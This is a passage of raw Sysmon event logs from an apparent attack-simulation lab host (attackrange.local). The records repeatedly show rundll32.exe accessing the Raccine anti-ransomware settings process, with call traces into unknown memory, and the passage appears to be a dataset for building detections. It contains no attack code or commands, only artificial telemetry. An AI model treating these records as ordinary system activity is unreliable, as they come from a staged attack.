Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082879Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082878Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082877Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082876Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082875Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082874Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082873Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082872Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082871Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082870Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082869Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082868Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082867Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082866Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082865Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082864Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082863Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082862Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082861Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082860Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082859Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082858Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082857Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082856Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082855Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082854Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082853Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082852Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082851Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082850Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082849Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082848Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082847Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082846Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082845Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082844Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082843Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082842Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082841Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082840Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082839Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082838Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082837Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082836Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082835Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082834Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082833Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082832Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082831Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082830Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082829Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082828Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082827Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082826Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082825Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082824Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082823Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082822Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082821Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082820Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082819Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082818Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082817Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082816Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 